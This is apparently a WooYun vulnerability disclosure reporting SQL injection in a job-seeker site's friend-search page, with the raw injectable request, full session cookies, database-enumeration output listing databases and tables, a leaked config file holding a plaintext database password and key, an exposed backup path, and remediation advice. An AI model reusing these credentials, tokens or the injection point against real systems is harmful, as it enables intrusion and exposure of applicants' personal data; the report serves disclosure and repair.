2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-29: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-09: 细节向核心白帽子及相关领域专家公开
2015-10-19: 细节向普通白帽子公开
2015-10-29: 细节向实习白帽子公开
2015-11-13: 细节向公众公开
RT
URL:http://**.**.**.**
测试:
GET /shixibao/cp.php?residecity=&name=aaa&username=&searchsubmit=%B2%E9%D5%D2&ac=friend&op=search&type=base HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EEReferer: http://**.**.**.**/shixibao/cp.php?ac=friend&op=search&view=resideAccept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=9pn1vm0akovauie5a335c5tvb2; lvid=b19139a2392c542f441d7e58c619e264; nvid=1; s_pers=%20s_fid%3D45636F5C10EB727B-2D660E17E30AF73F%7C1505822950638%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Deshipeship-189-all%253D%252526pid%25253D%2525252Freg2%252526pidt%25253D1%252526oid%25253Djavascript%2525253A%2525253B%252526ot%25253DA%3B; DQMHStanduserId=20150000000032913522; userId=1%7C20150000000032913522; dqmhIpCityInfos=%E5%8C%97%E4%BA%AC%E5%B8%82+%E8%81%94%E9%80%9A; loginStatus=logined; __qc_wId=356; pgv_pvid=5871468180; trkHmPageName=%2Fbj%2F; trkHmCoords=0; trkHmCity=0; trkHmLinks=0; cityCode=bj; SHOPID_COOKIEID=10001; s_cc=true; s_fid=48FC7A85226ECCFE-18831160BEDE3A5D; s_sq=eshipeship-189-all%3D%2526pid%253D%25252Fdqmh%25252FuserCenter%25252FmyOrderInfoList.do%25253Fmethod%25253DmangeAddr%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252F**.**.**.**%25252Fdqmh%25252FssoLink.do%25253Fmethod%25253Dskip%252526platNo%25253D93505%252526toStUrl%25253Dhttp%25253A%25252F%25252F**.**.**.**%2526ot%253DA; trkHmClickCoords=1284%2C8; LSID=aSEUDBw0HFa8WvQGL-; uchome_view_blogid=205; jiathis_rdc=%7B%22http%3A//**.**.**.**/shixibao/space.php%3Fuid%3D52131%26do%3Dblog%26id%3D206%22%3A0%7C1442665279182%2C%22http%3A//**.**.**.**/shixibao/space.php%3Fuid%3D52114%26do%3Dblog%26id%3D205%22%3A%220%7C1442665846816%22%7D; jnfbygbookbid=1; jnfbyloginnum=2; jnfbylastlogintime=1442666836; uchome_seccode=744dI4LaOKteAVAbz6x7ThTGunfUfl3SGWhujNXCP8LL; 
uchome_auth=b589k0qHxDIqjn39rocSgwJnruaOoGoBmKJdjDWIfJuO40SCQCR3ymxPdtHYKPyw5w3i5lvXx0EgEWG30JINuKiCIQ; uchome_loginuser=testwooyun; uchome_jnfbymluserid=52131; uchome_synfriend=1; uchome_reurl=%252Fshixibao%252Fcp.php%253Fac%253Dzhiwei_result_detail%2526ignore%253D1%2526jobid%253D6656; uchome_checkpm=1; uchome_sendmail=1; CNZZDATA1252975852=2119416073-1442662706-null%7C1442662706
权限和用户:
current user is DBA: True
current user: 'admin@%'
(即 Web 应用连接数据库所用的账号具有 DBA 权限,且主机部分为通配符 %,注入的影响因此不限于当前库。)
数据库(16个):
available databases [16]:
[*] cdcol
[*] cem_db
[*] game
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] shixibao
[*] shixibao_uc
[*] shixibao_uchome
[*] shixibao_uchome_20140525
[*] test
[*] testmql
[*] ultrax
[*] webauth
[*] zhiweibeifen
shixibao_uchome:
[182 tables]+----------------------------+| dajie || jobcollect || mm_attach_files || mm_audition_task || mm_audition_user || mm_city || mm_company_interest || mm_company_visitor || mm_compus_news || mm_compus_posdeli_view || mm_delivercont_view || mm_delivery || mm_delivery_attach || mm_department || mm_dept_location || mm_deptinfo || mm_dynamic || mm_employinfo || mm_employinfo_view || mm_enterprise_zhaopin || mm_follow || mm_grade_template || mm_grades_enter || mm_grades_user || mm_hgz_user || mm_home_card || mm_interview_notice || mm_jianzhi_delivery || mm_like || mm_lucky_log || mm_lucky_wall || mm_mail_template || mm_mailqueue || mm_member_view || mm_parttime_job || mm_personal_zhaopin || mm_post_attachment || mm_post_recommend || mm_postclass || mm_postclass_detail || mm_praise || mm_provinces || mm_questions || mm_questions_view || mm_replayments || mm_replayments_view || mm_report || mm_score || mm_score_eachsum || mm_score_item || mm_score_mark || mm_score_marker || mm_score_stat || mm_score_task || mm_score_template || mm_strategies || mm_students_star || mm_subscribe_job || mm_talent_pool || mm_task || mm_task_attach || mm_task_mapping || mm_taskcompany_map || mm_taskuser_map || mm_themes || mm_univs || mm_user_upload || mm_userbaseinfo || mm_usercode_map || mm_usereduinfo || mm_userinfo || mm_userinfo_zhiweiinfo_all || mm_userreg_channel || mm_userresumeinfo || mm_userskill_map || mm_useruniversmap || mm_userunivsmap_view || mm_video_course || mm_video_score || mm_video_wall || mm_whos_online || mm_work || mm_work_comment || mm_young_report || mm_young_report_map || mm_young_tribe || mm_younger_gd_temp || mm_youngmembers || mm_zhiwei_questions || mm_zhiwei_replayments || mm_zhiwei_send || mm_zhiwei_temp || mm_zhiweiapply_view || mm_zhiweiapply_view_1 || mm_zhiweiinfo || mm_ztask_classify || uchome_activity_notice || uchome_ad || uchome_adminsession || uchome_album || uchome_appcreditlog || uchome_blacklist || uchome_block || uchome_blog || 
uchome_blogfield || uchome_cache || uchome_class || uchome_click || uchome_clickuser || uchome_comment || uchome_config || uchome_coupon || uchome_creditlog || uchome_creditrule || uchome_cron || uchome_data || uchome_docomment || uchome_doing || uchome_event || uchome_eventclass || uchome_eventfield || uchome_eventinvite || uchome_eventpic || uchome_feed || uchome_friend || uchome_friendguide || uchome_friendlog || uchome_home_card || uchome_invite || uchome_job || uchome_log || uchome_magic || uchome_magicinlog || uchome_magicstore || uchome_magicuselog || uchome_mailcron || uchome_mailqueue || uchome_member || uchome_member_extend || uchome_member_third || uchome_mtag || uchome_mtaginvite || uchome_myapp || uchome_myinvite || uchome_notification || uchome_pic || uchome_picfield || uchome_poke || uchome_poll || uchome_pollfield || uchome_polloption || uchome_polluser || uchome_post || uchome_profield || uchome_profilefield || uchome_report || uchome_resume || uchome_session || uchome_share || uchome_show || uchome_space || uchome_spacefield || uchome_spaceinfo || uchome_spacelog || uchome_stat || uchome_statuser || uchome_tag || uchome_tagblog || uchome_tagspace || uchome_task || uchome_thread || uchome_topic || uchome_topicuser || uchome_userapp || uchome_userappfield || uchome_userevent || uchome_usergroup || uchome_userlog || uchome_usermagic || uchome_usertask || uchome_visitor || uchome_zan |+----------------------------+
shixibao_uchome -> mm_userinfo:35895 条用户资料信息
还有一些侧漏的东西:
1. http://**.**.**.**/shixibao/config.php.bak
应用管理->查看本应用->复制里面对应的配置信息进行替换)
define('UC_CONNECT', 'mysql'); // 连接 UCenter 的方式: mysql/NULL, 默认为空时为 fscoketopen(), mysql 是直接连接的数据库, 为了效率, 建议采用 mysql
define('UC_DBHOST', '**.**.**.**'); // UCenter 数据库主机
define('UC_DBUSER', 'admin'); // UCenter 数据库用户名
define('UC_DBPW', 'ctbri4008118114'); // UCenter 数据库密码
define('UC_DBNAME', 'shixibao_uc'); // UCenter 数据库名称
define('UC_DBCHARSET', 'gbk'); // UCenter 数据库字符集
define('UC_DBTABLEPRE', '`shixibao_uc`.uc_'); // UCenter 数据库表前缀
define('UC_DBCONNECT', '0'); // UCenter 数据库持久连接 0=关闭, 1=打开
define('UC_KEY', 'abc123'); // 与 UCenter 的通信密钥, 要与 UCenter 保持一致
define('UC_API', 'http://**.**.**.**/shixibao/ucenter'); // UCenter 的 URL 地址, 在调用头像时依赖此常量
define('UC_CHARSET', 'gbk'); // UCenter 的字符集
define('UC_IP', '**.**.**.**'); // UCenter 的 IP, 当 UC_CONNECT 为非 mysql 方式时, 并且当前应用服务器解析域名有问题时, 请设置此值
define('UC_APPID', '4'); // 当前应用的 ID
define('UC_PPP', 20);
2.备份:http://**.**.**.**/shixibao/data.rar
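保护应聘者的信息。具体建议:对 cp.php 好友搜索(ac=friend&op=search)接收的参数使用参数化查询并做输入校验;Web 应用不应使用具有 DBA 权限、且允许任意主机连接('admin@%')的数据库账号,应改用仅能访问本应用库的最小权限账号;从 Web 目录中清除 config.php.bak、data.rar 等备份文件,并更换其中已泄露的数据库密码和 UC_KEY(当前值过于简单)。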
危害等级:高
漏洞Rank:11
确认时间:2015-09-29 10:06
CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置
暂无